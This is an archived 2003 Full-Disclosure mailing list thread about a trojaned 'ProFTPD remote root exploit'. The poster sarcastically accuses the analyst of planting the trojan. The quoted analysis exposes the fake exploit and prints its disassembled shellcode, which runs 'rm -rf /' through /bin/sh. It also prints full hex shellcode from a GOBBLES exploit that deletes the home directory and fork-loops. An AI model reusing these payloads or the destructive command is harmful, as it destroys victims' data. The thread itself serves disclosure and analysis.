[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <F2LQDWB3KDHXHUGHCLEJBXEOFRDQDZONIPEDLZOD@ziplip.com>
From: mitch_hurrison at ziplip.com (mitch_hurrison@...lip.com)
Subject: Trojan author revealed (was: Re: ProFTPD-1.2.9rc2 remote root exploit)
Hi list,
Hrmm. Ok I'm no Sherlock Holmes but even I could see through this
'analysis'. This is obviously an elaborate attempt to soil the reputations of the fine people, dare I say heros of information
security, at GOBBLES security.
Let's examine the case at hand:
1) Someone makes the effort of cutting up an existing public GOBBLES
shellcode. An act that requires just as much effort as writing
original opcode.
2) This cutup version is used in a 'trojan' even my grandmother
would be able to spot. (Obscure in-exploit overflows are way more
effective folks, ask HD "I pioneered screensavers" Moore).
3) Some random hero pops up on the list pointing out that
'hey, this is GOBBLES shellcode *WINK*'
Now who, on God's green earth, would recognise shellcode from
an obscure exploit that was published months ago. If they
didn't have it fresh in memory?
So I think it's rather obvious either zeroboy, or one of his
friends is responsible for this trojan. And he has some sort of
rancune towards GOBBLES. Either that or he
has a serious hardon for memorising hex opcode buffers.
With regards,
Mitch
> -----Original Message-----
> From: zero [mailto:zeroboy@...akis.es]
> Sent: Friday, October 24, 2003, 1:19 PM
> To: full-disclosure@...ts.netsys.com
> Subject: Re: [Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit
>
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hmmm, let's see:
>
> Dump of assembler code for function shellcode:
> 0x08049480 <shellcode+0>: xor %eax,%eax
> 0x08049482 <shellcode+2>: push %eax
> 0x08049483 <shellcode+3>: push $0x582f2066
> 0x08049488 <shellcode+8>: push $0x722d206d
> 0x0804948d <shellcode+13>: push $0x7258632d
> 0x08049492 <shellcode+18>: push $0x41414141
> 0x08049497 <shellcode+23>: push $0x41414141
> 0x0804949c <shellcode+28>: push $0x41414141
> 0x080494a1 <shellcode+33>: push $0x41414141
> 0x080494a6 <shellcode+38>: push $0x4368732f
> 0x080494ab <shellcode+43>: push $0x6e69622f //
> /bin/shCAAAAAAAAAAAAAAAA/cXrm -rf /X
> 0x080494b0 <shellcode+48>: xor %eax,%eax
> 0x080494b2 <shellcode+50>: mov %al,0x7(%esp,1)
> 0x080494b6 <shellcode+54>: mov %al,0x1a(%esp,1)
> 0x080494ba <shellcode+58>: mov %al,0x23(%esp,1)
> 0x080494be <shellcode+62>: mov %esp,0x8(%esp,1)
> 0x080494c2 <shellcode+66>: xor %ebx,%ebx
> 0x080494c4 <shellcode+68>: lea 0x18(%esp,1),%ebx
> 0x080494c8 <shellcode+72>: mov %ebx,0xc(%esp,1)
> 0x080494cc <shellcode+76>: xor %ebx,%ebx
> 0x080494ce <shellcode+78>: lea 0x1b(%esp,1),%ebx
> 0x080494d2 <shellcode+82>: mov %ebx,0x10(%esp,1)
> 0x080494d6 <shellcode+86>: mov %eax,0x14(%esp,1)
> 0x080494da <shellcode+90>: xor %ebx,%ebx
> 0x080494dc <shellcode+92>: mov %esp,%ebx
> 0x080494de <shellcode+94>: lea 0x8(%esp,1),%ecx
> 0x080494e2 <shellcode+98>: xor %edx,%edx
> 0x080494e4 <shellcode+100>: lea 0x14(%esp,1),%edx
> 0x080494e8 <shellcode+104>: mov $0xb,%al
> 0x080494ea <shellcode+106>: int $0x80
> 0x080494ec <shellcode+108>: xor %ebx,%ebx
> 0x080494ee <shellcode+110>: xor %eax,%eax
> 0x080494f0 <shellcode+112>: inc %eax
> 0x080494f1 <shellcode+113>: int $0x80
> 0x080494f3 <shellcode+115>: add %al,(%eax)
> End of assembler dump.
>
> Let's give credits to the original c0d3rs of this shellcode. Nobody
> remembers jinglebellz.c?
>
> <snip>
> /*
> jinglebellz.c - local/remote exploit for mpg123
> (c) 2003 GOBBLES Security seXForces
>
> [...]
>
> unsigned char linux_shellcode[] = /* contributed by antiNSA */
> "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x3b\x50\x31\xc0\x68\x6f"
> "\x72\x74\x0a\x68\x6f\x20\x61\x62\x68\x2d\x63\x20\x74\x68\x43"
> "\x54\x52\x4c\x68\x73\x2e\x2e\x20\x68\x63\x6f\x6e\x64\x68\x35"
> "\x20\x73\x65\x68\x20\x69\x6e\x20\x68\x72\x66\x20\x7e\x68\x72"
> "\x6d\x20\x2d\xb3\x02\x89\xe1\xb2\x29\xb0\x04\xcd\x80\x31\xc0"
> "\x31\xff\xb0\x05\x89\xc7\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66"
> "\xba\x70\x50\x52\xb3\x02\x89\xe1\x31\xd2\xb2\x02\xb0\x04\xcd"
> "\x80\x31\xc0\x31\xdb\x31\xc9\x50\x40\x50\x89\xe3\xb0\xa2\xcd"
> "\x80\x4f\x31\xc0\x39\xc7\x75\xd1\x31\xc0\x31\xdb\x31\xc9\x31"
> "\xd2\x68\x66\x20\x7e\x58\x68\x6d\x20\x2d\x72\x68\x2d\x63\x58"
> "\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41\x41\x41"
> "\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f\x62\x69"
> "\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44\x24\x23"
> "\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24\x0c\x31"
> "\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14\x31\xdb"
> "\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0\x0b\xcd"
> "\x80\x31\xdb\x31\xc0\x40\xcd\x80";
>
> </snip>
>
> Well well, just a nice copy paste of some of it? :pPpPpPppP
>
> And the exact cmd is:
> execve("/bin/sh", {"/bin/sh", "-c", "rm -rf /", NULL}, {"rm -rf /", NULL})
>
> NOTE: In this one ~ is change for a nicer one /
>
> Have a nice turkey.
>
> Cheerz
>
>
>
> www.citfi.org
> www.podergeek.com
> **********************************
> "The further backward you look, the further forward you can see" Winston
> Churchill
> "Access is GOD..."
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
>
> iQA/AwUBP5lx/Q0R8jZM93x8EQJCdwCg9HfcZVDSO8/JCA17lHdkkKT7nKEAn0C6
> l9RpeQ2ZrufRkkV3dflO1dTB
> =kkQd
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists